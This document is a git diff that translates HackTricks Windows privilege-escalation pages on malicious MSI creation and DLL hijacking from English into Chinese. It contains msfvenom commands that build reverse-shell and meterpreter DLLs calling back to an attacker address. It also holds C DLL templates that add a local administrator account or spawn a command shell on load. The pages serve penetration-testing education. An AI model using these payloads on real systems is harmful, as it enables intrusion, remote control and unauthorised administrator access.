+目标是生成一个将执行 lnk 文件的 MSI。为了实现这一点，可以使用以下 XML 代码（[xml 来自这里](https://0xrick.github.io/hack-the-box/ethereal/#Creating-Malicious-msi-and-getting-root)）：
 ```markup
 <?xml version="1.0"?>
 <Wix xmlns="http://schemas.microsoft.com/wix/2006/wi">
@@ -39,32 +38,26 @@ fail_here
 </Product>
 </Wix>
 ```
+重要的是要注意，Package 元素包含诸如 InstallerVersion 和 Compressed 等属性，分别指定安装程序的版本并指示包是否被压缩。
 
-It is important to note that the Package element contains attributes such as InstallerVersion and Compressed, specifying the version of the installer and indicating whether the package is compressed or not, respectively.
-
-The creation process involves utilizing candle.exe, a tool from wixtools, to generate a wixobject from msi.xml. The following command should be executed:
-
+创建过程涉及使用来自 wixtools 的 candle.exe 工具，从 msi.xml 生成 wixobject。应执行以下命令：
 ```
 candle.exe -out C:\tem\wix C:\tmp\Ethereal\msi.xml
 ```
+此外，值得一提的是，帖子中提供了一张图片，展示了命令及其输出。您可以参考它以获得视觉指导。
 
-Additionally, it is worth mentioning that an image is provided in the post, which depicts the command and its output. You can refer to it for visual guidance.
-
-Furthermore, light.exe, another tool from wixtools, will be employed to create the MSI file from the wixobject. The command to be executed is as follows:
-
+此外，light.exe，wixtools中的另一个工具，将用于从wixobject创建MSI文件。要执行的命令如下：
 ```
 light.exe -out C:\tm\Ethereal\rick.msi C:\tmp\wix
 ```
+与之前的命令类似，帖子中包含了一张图像，说明了该命令及其输出。
 
-Similar to the previous command, an image is included in the post illustrating the command and its output.
+请注意，虽然本摘要旨在提供有价值的信息，但建议参考原始帖子以获取更全面的细节和准确的说明。
 
-Please note that while this summary aims to provide valuable information, it is recommended to refer to the original post for more comprehensive details and accurate instructions.
-
-## References
+## 参考
 
 - [https://0xrick.github.io/hack-the-box/ethereal/#Creating-Malicious-msi-and-getting-root](https://0xrick.github.io/hack-the-box/ethereal/#Creating-Malicious-msi-and-getting-root)
 - [https://www.codeproject.com/Tips/105638/A-quick-introduction-Create-an-MSI-installer-with](https://www.codeproject.com/Tips/105638/A-quick-introduction-Create-an-MSI-installer-with)
-  [wixtools](http://wixtoolset.org)
+[wixtools](http://wixtoolset.org)
 
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/windows-hardening/windows-local-privilege-escalation/dll-hijacking.md b/src/windows-hardening/windows-local-privilege-escalation/dll-hijacking.md
index 8c85631d0..ccc4d1f97 100644
--- a/src/windows-hardening/windows-local-privilege-escalation/dll-hijacking.md
+++ b/src/windows-hardening/windows-local-privilege-escalation/dll-hijacking.md
@@ -4,172 +4,158 @@
 
 <figure><img src="../../images/i3.png" alt=""><figcaption></figcaption></figure>
 
-**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!
+**Bug bounty tip**: **注册** **Intigriti**，这是一个**由黑客为黑客创建的高级漏洞赏金平台**！今天就加入我们，开始赚取高达**$100,000**的赏金，访问[**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks)！
 
 {% embed url="https://go.intigriti.com/hacktricks" %}
 
 ## Basic Information
 
-DLL Hijacking involves manipulating a trusted application into loading a malicious DLL. This term encompasses several tactics like **DLL Spoofing, Injection, and Side-Loading**. It's mainly utilized for code execution, achieving persistence, and, less commonly, privilege escalation. Despite the focus on escalation here, the method of hijacking remains consistent across objectives.
+DLL Hijacking涉及操纵受信任的应用程序加载恶意DLL。这个术语涵盖了几种策略，如**DLL Spoofing、Injection和Side-Loading**。它主要用于代码执行、实现持久性，以及较少见的权限提升。尽管这里的重点是提升，但劫持的方法在不同目标之间保持一致。
 
 ### Common Techniques
 
-Several methods are employed for DLL hijacking, each with its effectiveness depending on the application's DLL loading strategy:
+用于DLL劫持的几种方法，每种方法的有效性取决于应用程序的DLL加载策略：
 
-1. **DLL Replacement**: Swapping a genuine DLL with a malicious one, optionally using DLL Proxying to preserve the original DLL's functionality.
-2. **DLL Search Order Hijacking**: Placing the malicious DLL in a search path ahead of the legitimate one, exploiting the application's search pattern.
-3. **Phantom DLL Hijacking**: Creating a malicious DLL for an application to load, thinking it's a non-existent required DLL.
-4. **DLL Redirection**: Modifying search parameters like `%PATH%` or `.exe.manifest` / `.exe.local` files to direct the application to the malicious DLL.
-5. **WinSxS DLL Replacement**: Substituting the legitimate DLL with a malicious counterpart in the WinSxS directory, a method often associated with DLL side-loading.
-6. **Relative Path DLL Hijacking**: Placing the malicious DLL in a user-controlled directory with the copied application, resembling Binary Proxy Execution techniques.
+1. **DLL Replacement**: 用恶意DLL替换真实DLL，选择性地使用DLL Proxying以保留原始DLL的功能。
+2. **DLL Search Order Hijacking**: 将恶意DLL放置在合法DLL之前的搜索路径中，利用应用程序的搜索模式。
+3. **Phantom DLL Hijacking**: 创建一个恶意DLL供应用程序加载，认为它是一个不存在的必需DLL。
+4. **DLL Redirection**: 修改搜索参数，如`%PATH%`或`.exe.manifest` / `.exe.local`文件，以引导应用程序加载恶意DLL。
+5. **WinSxS DLL Replacement**: 在WinSxS目录中用恶意DLL替换合法DLL，这种方法通常与DLL侧加载相关。
+6. **Relative Path DLL Hijacking**: 将恶意DLL放置在用户控制的目录中，与复制的应用程序一起，类似于二进制代理执行技术。
 
 ## Finding missing Dlls
 
-The most common way to find missing Dlls inside a system is running [procmon](https://docs.microsoft.com/en-us/sysinternals/downloads/procmon) from sysinternals, **setting** the **following 2 filters**:
+在系统中查找缺失的DLL最常见的方法是从sysinternals运行[procmon](https://docs.microsoft.com/en-us/sysinternals/downloads/procmon)，**设置** **以下两个过滤器**：
 
 ![](<../../images/image (311).png>)
 
 ![](<../../images/image (313).png>)
 
-and just show the **File System Activity**:
+并仅显示**文件系统活动**：
 
 ![](<../../images/image (314).png>)
 
-If you are looking for **missing dlls in general** you **leave** this running for some **seconds**.\
-If you are looking for a **missing dll inside an specific executable** you should set **another filter like "Process Name" "contains" "\<exec name>", execute it, and stop capturing events**.
+如果您在寻找**缺失的dll**，可以**让它运行几秒钟**。\
+如果您在寻找**特定可执行文件中的缺失dll**，则应设置**另一个过滤器，如“进程名称” “包含” "\<exec name>"，执行它，然后停止捕获事件**。
 
 ## Exploiting Missing Dlls
 
-In order to escalate privileges, the best chance we have is to be able to **write a dll that a privilege process will try to load** in some of **place where it is going to be searched**. Therefore, we will be able to **write** a dll in a **folder** where the **dll is searched before** the folder where the **original dll** is (weird case), or we will be able to **write on some folder where the dll is going to be searched** and the original **dll doesn't exist** on any folder.
+为了提升权限，我们最好的机会是能够**编写一个特权进程将尝试加载的dll**，在**将要搜索的某个位置**。因此，我们将能够在**dll被搜索的文件夹中**写入一个dll，而这个文件夹在**原始dll**所在的文件夹之前（奇怪的情况），或者我们将能够在**dll将要被搜索的某个文件夹中**写入，而原始**dll在任何文件夹中都不存在**。
 
 ### Dll Search Order
 
-**Inside the** [**Microsoft documentation**](https://docs.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-search-order#factors-that-affect-searching) **you can find how the Dlls are loaded specifically.**
+**在** [**Microsoft文档**](https://docs.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-search-order#factors-that-affect-searching) **中，您可以找到DLL的具体加载方式。**
 
-**Windows applications** look for DLLs by following a set of **pre-defined search paths**, adhering to a particular sequence. The issue of DLL hijacking arises when a harmful DLL is strategically placed in one of these directories, ensuring it gets loaded before the authentic DLL. A solution to prevent this is to ensure the application uses absolute paths when referring to the DLLs it requires.
+**Windows应用程序**通过遵循一组**预定义的搜索路径**来查找DLL，遵循特定的顺序。当有害DLL被战略性地放置在这些目录之一时，DLL劫持的问题就出现了，确保它在真实DLL之前被加载。防止这种情况的解决方案是确保应用程序在引用所需DLL时使用绝对路径。
 
-You can see the **DLL search order on 32-bit** systems below:
+您可以在32位系统上看到**DLL搜索顺序**如下：
 
-1. The directory from which the application loaded.
-2. The system directory. Use the [**GetSystemDirectory**](https://docs.microsoft.com/en-us/windows/desktop/api/sysinfoapi/nf-sysinfoapi-getsystemdirectorya) function to get the path of this directory.(_C:\Windows\System32_)
-3. The 16-bit system directory. There is no function that obtains the path of this directory, but it is searched. (_C:\Windows\System_)
-4. The Windows directory. Use the [**GetWindowsDirectory**](https://docs.microsoft.com/en-us/windows/desktop/api/sysinfoapi/nf-sysinfoapi-getwindowsdirectorya) function to get the path of this directory.
-   1. (_C:\Windows_)
-5. The current directory.
-6. The directories that are listed in the PATH environment variable. Note that this does not include the per-application path specified by the **App Paths** registry key. The **App Paths** key is not used when computing the DLL search path.
+1. 应用程序加载的目录。
+2. 系统目录。使用[**GetSystemDirectory**](https://docs.microsoft.com/en-us/windows/desktop/api/sysinfoapi/nf-sysinfoapi-getsystemdirectorya)函数获取该目录的路径。(_C:\Windows\System32_)
+3. 16位系统目录。没有函数获取该目录的路径，但会进行搜索。(_C:\Windows\System_)
+4. Windows目录。使用[**GetWindowsDirectory**](https://docs.microsoft.com/en-us/windows/desktop/api/sysinfoapi/nf-sysinfoapi-getwindowsdirectorya)函数获取该目录的路径。(_C:\Windows_)
+5. 当前目录。
+6. 在PATH环境变量中列出的目录。请注意，这不包括由**App Paths**注册表项指定的每个应用程序路径。在计算DLL搜索路径时不使用**App Paths**键。
 
-That is the **default** search order with **SafeDllSearchMode** enabled. When it's disabled the current directory escalates to second place. To disable this feature, create the **HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager**\\**SafeDllSearchMode** registry value and set it to 0 (default is enabled).
+这是启用**SafeDllSearchMode**的**默认**搜索顺序。当禁用时，当前目录提升到第二位。要禁用此功能，请创建**HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager**\\**SafeDllSearchMode**注册表值并将其设置为0（默认启用）。
 
-If [**LoadLibraryEx**](https://docs.microsoft.com/en-us/windows/desktop/api/LibLoaderAPI/nf-libloaderapi-loadlibraryexa) function is called with **LOAD_WITH_ALTERED_SEARCH_PATH** the search begins in the directory of the executable module that **LoadLibraryEx** is loading.
+如果调用[**LoadLibraryEx**](https://docs.microsoft.com/en-us/windows/desktop/api/LibLoaderAPI/nf-libloaderapi-loadlibraryexa)函数时使用**LOAD_WITH_ALTERED_SEARCH_PATH**，搜索将从**LoadLibraryEx**正在加载的可执行模块的目录开始。
 
-Finally, note that **a dll could be loaded indicating the absolute path instead just the name**. In that case that dll is **only going to be searched in that path** (if the dll has any dependencies, they are going to be searched as just loaded by name).
+最后，请注意**dll可以通过指示绝对路径而不是仅仅是名称来加载**。在这种情况下，该dll**只会在该路径中被搜索**（如果dll有任何依赖项，它们将被视为仅按名称加载进行搜索）。
 
-There are other ways to alter the ways to alter the search order but I'm not going to explain them here.
+还有其他方法可以更改搜索顺序，但我在这里不打算解释它们。
 
 #### Exceptions on dll search order from Windows docs
 
-Certain exceptions to the standard DLL search order are noted in Windows documentation:
+Windows文档中指出了标准DLL搜索顺序的某些例外：
 
-- When a **DLL that shares its name with one already loaded in memory** is encountered, the system bypasses the usual search. Instead, it performs a check for redirection and a manifest before defaulting to the DLL already in memory. **In this scenario, the system does not conduct a search for the DLL**.
-- In cases where the DLL is recognized as a **known DLL** for the current Windows version, the system will utilize its version of the known DLL, along with any of its dependent DLLs, **forgoing the search process**. The registry key **HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs** holds a list of these known DLLs.
-- Should a **DLL have dependencies**, the search for these dependent DLLs is conducted as though they were indicated only by their **module names**, regardless of whether the initial DLL was identified through a full path.
+- 当遇到**与内存中已加载的DLL同名的DLL**时，系统会绕过通常的搜索。相反，它会在默认使用内存中已加载的DLL之前进行重定向和清单检查。在这种情况下，系统不会进行DLL搜索。
+- 在DLL被识别为当前Windows版本的**已知DLL**的情况下，系统将使用其版本的已知DLL及其任何依赖DLL，**跳过搜索过程**。注册表项**HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs**保存这些已知DLL的列表。
+- 如果**DLL有依赖项**，则对这些依赖DLL的搜索将像仅通过其**模块名称**指示一样进行，而不管初始DLL是否通过完整路径识别。
 
 ### Escalating Privileges
 
 **Requirements**:
 
-- Identify a process that operates or will operate under **different privileges** (horizontal or lateral movement), which is **lacking a DLL**.
-- Ensure **write access** is available for any **directory** in which the **DLL** will be **searched for**. This location might be the directory of the executable or a directory within the system path.
+- 确定一个在**不同权限**下运行或将要运行的进程（水平或侧向移动），该进程**缺少DLL**。
+- 确保在**DLL**将被**搜索的**任何**目录**中有**写入访问权限**。此位置可能是可执行文件的目录或系统路径中的目录。
 
-Yeah, the requisites are complicated to find as **by default it's kind of weird to find a privileged executable missing a dll** and it's even **more weird to have write permissions on a system path folder** (you can't by default). But, in misconfigured environments this is possible.\
-In the case you are lucky and you find yourself meeting the requirements, you could check the [UACME](https://github.com/hfiref0x/UACME) project. Even if the **main goal of the project is bypass UAC**, you may find there a **PoC** of a Dll hijaking for the Windows version that you can use (probably just changing the path of the folder where you have write permissions).
-
-Note that you can **check your permissions in a folder** doing:
+是的，要求很难找到，因为**默认情况下，找不到缺少dll的特权可执行文件**，而且在系统路径文件夹中拥有写入权限甚至**更奇怪**（默认情况下您无法）。但是，在配置错误的环境中，这是可能的。\
+如果您运气好，满足要求，您可以查看[UACME](https://github.com/hfiref0x/UACME)项目。即使**该项目的主要目标是绕过UAC**，您也可能会在那里找到一个Windows版本的DLL劫持的**PoC**（可能只需更改您有写入权限的文件夹的路径）。
 
+请注意，您可以通过以下方式**检查文件夹中的权限**：
 ```bash
 accesschk.exe -dqv "C:\Python27"
 icacls "C:\Python27"
 ```
-
-And **check permissions of all folders inside PATH**:
-
+并**检查PATH中所有文件夹的权限**：
 ```bash
 for %%A in ("%path:;=";"%") do ( cmd.exe /c icacls "%%~A" 2>nul | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%" && echo. )
 ```
-
-You can also check the imports of an executable and the exports of a dll with:
-
+您还可以使用以下命令检查可执行文件的导入和 DLL 的导出：
 ```c
 dumpbin /imports C:\path\Tools\putty\Putty.exe
 dumpbin /export /path/file.dll
 ```
-
-For a full guide on how to **abuse Dll Hijacking to escalate privileges** with permissions to write in a **System Path folder** check:
+对于如何**利用Dll劫持提升权限**的完整指南，检查：
 
 {{#ref}}
 dll-hijacking/writable-sys-path-+dll-hijacking-privesc.md
 {{#endref}}
 
-### Automated tools
+### 自动化工具
 
-[**Winpeas** ](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS)will check if you have write permissions on any folder inside system PATH.\
-Other interesting automated tools to discover this vulnerability are **PowerSploit functions**: _Find-ProcessDLLHijack_, _Find-PathDLLHijack_ and _Write-HijackDll._
+[**Winpeas**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS)将检查您是否对系统PATH中的任何文件夹具有写入权限。\
+其他发现此漏洞的有趣自动化工具包括**PowerSploit函数**：_Find-ProcessDLLHijack_，_Find-PathDLLHijack_和_Write-HijackDll_。
 
-### Example
+### 示例
 
-In case you find an exploitable scenario one of the most important things to successfully exploit it would be to **create a dll that exports at least all the functions the executable will import from it**. Anyway, note that Dll Hijacking comes handy in order to [escalate from Medium Integrity level to High **(bypassing UAC)**](../authentication-credentials-uac-and-efs.md#uac) or from[ **High Integrity to SYSTEM**](./#from-high-integrity-to-system)**.** You can find an example of **how to create a valid dll** inside this dll hijacking study focused on dll hijacking for execution: [**https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows**](https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows)**.**\
-Moreover, in the **next sectio**n you can find some **basic dll codes** that might be useful as **templates** or to create a **dll with non required functions exported**.
+如果您发现一个可利用的场景，成功利用它的最重要的事情之一是**创建一个导出至少所有可执行文件将从中导入的函数的dll**。无论如何，请注意，Dll劫持在[**从中等完整性级别提升到高完整性（绕过UAC）**](../authentication-credentials-uac-and-efs.md#uac)或从[**高完整性提升到SYSTEM**](./#from-high-integrity-to-system)**时非常有用。**您可以在这个专注于执行的dll劫持研究中找到**如何创建有效dll**的示例：[**https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows**](https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows)**。**\
+此外，在**下一节**中，您可以找到一些**基本dll代码**，这些代码可能作为**模板**或用于创建**导出非必需函数的dll**。
 
-## **Creating and compiling Dlls**
+## **创建和编译Dll**
 
-### **Dll Proxifying**
+### **Dll代理**
 
-Basically a **Dll proxy** is a Dll capable of **execute your malicious code when loaded** but also to **expose** and **work** as **exected** by **relaying all the calls to the real library**.
+基本上，**Dll代理**是一个能够**在加载时执行您的恶意代码**的Dll，同时也能**暴露**并**按预期工作**，通过**将所有调用转发到真实库**。
 
-With the tool [**DLLirant**](https://github.com/redteamsocietegenerale/DLLirant) or [**Spartacus**](https://github.com/Accenture/Spartacus) you can actually **indicate an executable and select the library** you want to proxify and **generate a proxified dll** or **indicate the Dll** and **generate a proxified dll**.
+使用工具[**DLLirant**](https://github.com/redteamsocietegenerale/DLLirant)或[**Spartacus**](https://github.com/Accenture/Spartacus)，您可以**指定一个可执行文件并选择要代理的库**，并**生成一个代理dll**，或**指定Dll并生成一个代理dll**。
 
 ### **Meterpreter**
 
-**Get rev shell (x64):**
-
+**获取反向shell (x64)：**
 ```bash
 msfvenom -p windows/x64/shell/reverse_tcp LHOST=192.169.0.100 LPORT=4444 -f dll -o msf.dll
 ```
-
-**Get a meterpreter (x86):**
-
+**获取一个 meterpreter (x86):**
 ```bash
 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.169.0.100 LPORT=4444 -f dll -o msf.dll
 ```
-
-**Create a user (x86 I didn't see a x64 version):**
-
+**创建用户（x86 我没有看到 x64 版本）：**
 ```
 msfvenom -p windows/adduser USER=privesc PASS=Attacker@123 -f dll -o msf.dll
 ```
+### 你自己的
 
-### Your own
-
-Note that in several cases the Dll that you compile must **export several functions** that are going to be loaded by the victim process, if these functions doesn't exist the **binary won't be able to load** them and the **exploit will fail**.
-
+请注意，在多个情况下，您编译的 Dll 必须 **导出多个函数**，这些函数将被受害者进程加载，如果这些函数不存在，**二进制文件将无法加载**它们，**攻击将失败**。
 ```c
 // Tested in Win10
 // i686-w64-mingw32-g++ dll.c -lws2_32 -o srrstr.dll -shared
 #include <windows.h>
 BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved){
-    switch(dwReason){
-        case DLL_PROCESS_ATTACH:
-            system("whoami > C:\\users\\username\\whoami.txt");
-            WinExec("calc.exe", 0); //This doesn't accept redirections like system
-            break;
-        case DLL_PROCESS_DETACH:
-            break;
-        case DLL_THREAD_ATTACH:
-            break;
-        case DLL_THREAD_DETACH:
-            break;
-    }
-    return TRUE;
+switch(dwReason){
+case DLL_PROCESS_ATTACH:
+system("whoami > C:\\users\\username\\whoami.txt");
+WinExec("calc.exe", 0); //This doesn't accept redirections like system
+break;
+case DLL_PROCESS_DETACH:
+break;
+case DLL_THREAD_ATTACH:
+break;
+case DLL_THREAD_DETACH:
+break;
+}
+return TRUE;
 }
 ```
 
@@ -179,11 +165,11 @@ BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved){
 
 #include <windows.h>
 BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved){
-    if (dwReason == DLL_PROCESS_ATTACH){
-        system("cmd.exe /k net localgroup administrators user /add");
-        ExitProcess(0);
-    }
-    return TRUE;
+if (dwReason == DLL_PROCESS_ATTACH){
+system("cmd.exe /k net localgroup administrators user /add");
+ExitProcess(0);
+}
+return TRUE;
 }
 ```
 
@@ -195,15 +181,15 @@ BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved){
 
 int owned()
 {
-  WinExec("cmd.exe /c net user cybervaca Password01 ; net localgroup administrators cybervaca /add", 0);
-  exit(0);
-  return 0;
+WinExec("cmd.exe /c net user cybervaca Password01 ; net localgroup administrators cybervaca /add", 0);
+exit(0);
+return 0;
 }
 
 BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved)
 {
-  owned();
-  return 0;
+owned();
+return 0;
 }
 ```
 
@@ -216,33 +202,31 @@ BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved)
 #include<stdio.h>
 
 void Entry (){ //Default function that is executed when the DLL is loaded
-    system("cmd");
+system("cmd");
 }
 
 BOOL APIENTRY DllMain (HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) {
-    switch (ul_reason_for_call){
-        case DLL_PROCESS_ATTACH:
-            CreateThread(0,0, (LPTHREAD_START_ROUTINE)Entry,0,0,0);
-            break;
-        case DLL_THREAD_ATTACH:
-        case DLL_THREAD_DETACH:
-        case DLL_PROCESS_DEATCH:
-            break;
-    }
-    return TRUE;
+switch (ul_reason_for_call){
+case DLL_PROCESS_ATTACH:
+CreateThread(0,0, (LPTHREAD_START_ROUTINE)Entry,0,0,0);
+break;
+case DLL_THREAD_ATTACH:
+case DLL_THREAD_DETACH:
+case DLL_PROCESS_DEATCH:
+break;
+}
+return TRUE;
 }
 ```
-
-## References
+## 参考
 
 - [https://medium.com/@pranaybafna/tcapt-dll-hijacking-888d181ede8e](https://medium.com/@pranaybafna/tcapt-dll-hijacking-888d181ede8e)
 - [https://cocomelonc.github.io/pentest/2021/09/24/dll-hijacking-1.html](https://cocomelonc.github.io/pentest/2021/09/24/dll-hijacking-1.html)
 
 <figure><img src="../../images/i3.png" alt=""><figcaption></figcaption></figure>
 
-**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!
+**漏洞赏金提示**：**注册** **Intigriti**，一个由黑客为黑客创建的高级**漏洞赏金平台**！今天就加入我们，访问 [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks)，开始赚取高达 **$100,000** 的赏金！
 
 {% embed url="https://go.intigriti.com/hacktricks" %}
 
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/windows-hardening/windows-local-privilege-escalation/dll-hijacking/README.md b/src/windows-hardening/windows-local-privilege-escalation/dll-hijacking/README.md
index 51fe854d6..7e1c34ad8 100644
--- a/src/windows-hardening/windows-local-privilege-escalation/dll-hijacking/README.md
+++ b/src/windows-hardening/windows-local-privilege-escalation/dll-hijacking/README.md
@@ -4,172 +4,158 @@
 
 <figure><img src="../../../images/i3.png" alt=""><figcaption></figcaption></figure>
 
-**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!
+**Bug bounty tip**: **注册** **Intigriti**，这是一个由黑客为黑客创建的高级**漏洞赏金平台**！今天就加入我们，访问 [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks)，开始赚取高达 **$100,000** 的赏金！
 
 {% embed url="https://go.intigriti.com/hacktricks" %}
 
 ## Basic Information
 
-DLL Hijacking involves manipulating a trusted application into loading a malicious DLL. This term encompasses several tactics like **DLL Spoofing, Injection, and Side-Loading**. It's mainly utilized for code execution, achieving persistence, and, less commonly, privilege escalation. Despite the focus on escalation here, the method of hijacking remains consistent across objectives.
+DLL Hijacking 涉及操纵受信任的应用程序加载恶意 DLL。这个术语涵盖了几种战术，如 **DLL Spoofing、Injection 和 Side-Loading**。它主要用于代码执行、实现持久性，以及较少见的权限提升。尽管这里的重点是提升，但劫持的方法在不同目标之间保持一致。
 
 ### Common Techniques
 
-Several methods are employed for DLL hijacking, each with its effectiveness depending on the application's DLL loading strategy:
+用于 DLL 劫持的几种方法，每种方法的有效性取决于应用程序的 DLL 加载策略：
 
-1. **DLL Replacement**: Swapping a genuine DLL with a malicious one, optionally using DLL Proxying to preserve the original DLL's functionality.
-2. **DLL Search Order Hijacking**: Placing the malicious DLL in a search path ahead of the legitimate one, exploiting the application's search pattern.
-3. **Phantom DLL Hijacking**: Creating a malicious DLL for an application to load, thinking it's a non-existent required DLL.
-4. **DLL Redirection**: Modifying search parameters like `%PATH%` or `.exe.manifest` / `.exe.local` files to direct the application to the malicious DLL.
-5. **WinSxS DLL Replacement**: Substituting the legitimate DLL with a malicious counterpart in the WinSxS directory, a method often associated with DLL side-loading.
-6. **Relative Path DLL Hijacking**: Placing the malicious DLL in a user-controlled directory with the copied application, resembling Binary Proxy Execution techniques.
+1. **DLL Replacement**: 用恶意 DLL 替换真实 DLL，选择性地使用 DLL Proxying 保留原始 DLL 的功能。
+2. **DLL Search Order Hijacking**: 将恶意 DLL 放置在合法 DLL 之前的搜索路径中，利用应用程序的搜索模式。
+3. **Phantom DLL Hijacking**: 创建一个恶意 DLL 供应用程序加载，认为它是一个不存在的必需 DLL。
+4. **DLL Redirection**: 修改搜索参数，如 `%PATH%` 或 `.exe.manifest` / `.exe.local` 文件，以引导应用程序加载恶意 DLL。
+5. **WinSxS DLL Replacement**: 在 WinSxS 目录中用恶意 DLL 替换合法 DLL，这种方法通常与 DLL 侧加载相关。
+6. **Relative Path DLL Hijacking**: 将恶意 DLL 放置在用户控制的目录中，与复制的应用程序一起，类似于二进制代理执行技术。
 
 ## Finding missing Dlls
 
-The most common way to find missing Dlls inside a system is running [procmon](https://docs.microsoft.com/en-us/sysinternals/downloads/procmon) from sysinternals, **setting** the **following 2 filters**:
+在系统中查找缺失的 DLL 的最常见方法是运行 [procmon](https://docs.microsoft.com/en-us/sysinternals/downloads/procmon)，**设置** **以下 2 个过滤器**：
 
 ![](<../../../images/image (961).png>)
 
 ![](<../../../images/image (230).png>)
 
-and just show the **File System Activity**:
+并仅显示 **文件系统活动**：
 
 ![](<../../../images/image (153).png>)
 
-If you are looking for **missing dlls in general** you **leave** this running for some **seconds**.\
-If you are looking for a **missing dll inside an specific executable** you should set **another filter like "Process Name" "contains" "\<exec name>", execute it, and stop capturing events**.
+如果您在寻找 **缺失的 dll**，可以 **让它运行几秒钟**。\
+如果您在寻找 **特定可执行文件中的缺失 dll**，则应设置 **另一个过滤器，如 "Process Name" "contains" "\<exec name>"，执行它，然后停止捕获事件**。
 
 ## Exploiting Missing Dlls
 
-In order to escalate privileges, the best chance we have is to be able to **write a dll that a privilege process will try to load** in some of **place where it is going to be searched**. Therefore, we will be able to **write** a dll in a **folder** where the **dll is searched before** the folder where the **original dll** is (weird case), or we will be able to **write on some folder where the dll is going to be searched** and the original **dll doesn't exist** on any folder.
+为了提升权限，我们最好的机会是能够 **编写一个特权进程将尝试加载的 dll**，在 **将要搜索的某个位置**。因此，我们将能够在 **dll 被搜索的文件夹中写入**一个 dll，而这个文件夹在 **原始 dll** 的文件夹之前（奇怪的情况），或者我们将能够在 **将要搜索的某个文件夹中写入**，而原始 **dll** 在任何文件夹中都不存在。
 
 ### Dll Search Order
 
-**Inside the** [**Microsoft documentation**](https://docs.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-search-order#factors-that-affect-searching) **you can find how the Dlls are loaded specifically.**
+**在** [**Microsoft 文档**](https://docs.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-search-order#factors-that-affect-searching) **中，您可以找到 DLL 的具体加载方式。**
 
-**Windows applications** look for DLLs by following a set of **pre-defined search paths**, adhering to a particular sequence. The issue of DLL hijacking arises when a harmful DLL is strategically placed in one of these directories, ensuring it gets loaded before the authentic DLL. A solution to prevent this is to ensure the application uses absolute paths when referring to the DLLs it requires.
+**Windows 应用程序**通过遵循一组 **预定义的搜索路径** 来查找 DLL，遵循特定的顺序。当有害 DLL 被战略性地放置在这些目录之一时，DLL 劫持的问题就出现了，确保它在真实 DLL 之前被加载。防止这种情况的解决方案是确保应用程序在引用所需 DLL 时使用绝对路径。
 
-You can see the **DLL search order on 32-bit** systems below:
+您可以在 32 位系统上看到 **DLL 搜索顺序**如下：
 
-1. The directory from which the application loaded.
-2. The system directory. Use the [**GetSystemDirectory**](https://docs.microsoft.com/en-us/windows/desktop/api/sysinfoapi/nf-sysinfoapi-getsystemdirectorya) function to get the path of this directory.(_C:\Windows\System32_)
-3. The 16-bit system directory. There is no function that obtains the path of this directory, but it is searched. (_C:\Windows\System_)
-4. The Windows directory. Use the [**GetWindowsDirectory**](https://docs.microsoft.com/en-us/windows/desktop/api/sysinfoapi/nf-sysinfoapi-getwindowsdirectorya) function to get the path of this directory.
-   1. (_C:\Windows_)
-5. The current directory.
-6. The directories that are listed in the PATH environment variable. Note that this does not include the per-application path specified by the **App Paths** registry key. The **App Paths** key is not used when computing the DLL search path.
+1. 应用程序加载的目录。
+2. 系统目录。使用 [**GetSystemDirectory**](https://docs.microsoft.com/en-us/windows/desktop/api/sysinfoapi/nf-sysinfoapi-getsystemdirectorya) 函数获取该目录的路径。(_C:\Windows\System32_)
+3. 16 位系统目录。没有函数获取该目录的路径，但会进行搜索。 (_C:\Windows\System_)
+4. Windows 目录。使用 [**GetWindowsDirectory**](https://docs.microsoft.com/en-us/windows/desktop/api/sysinfoapi/nf-sysinfoapi-getwindowsdirectorya) 函数获取该目录的路径。(_C:\Windows_)
+5. 当前目录。
+6. 在 PATH 环境变量中列出的目录。请注意，这不包括 **App Paths** 注册表项指定的每个应用程序路径。计算 DLL 搜索路径时不使用 **App Paths** 键。
 
-That is the **default** search order with **SafeDllSearchMode** enabled. When it's disabled the current directory escalates to second place. To disable this feature, create the **HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager**\\**SafeDllSearchMode** registry value and set it to 0 (default is enabled).
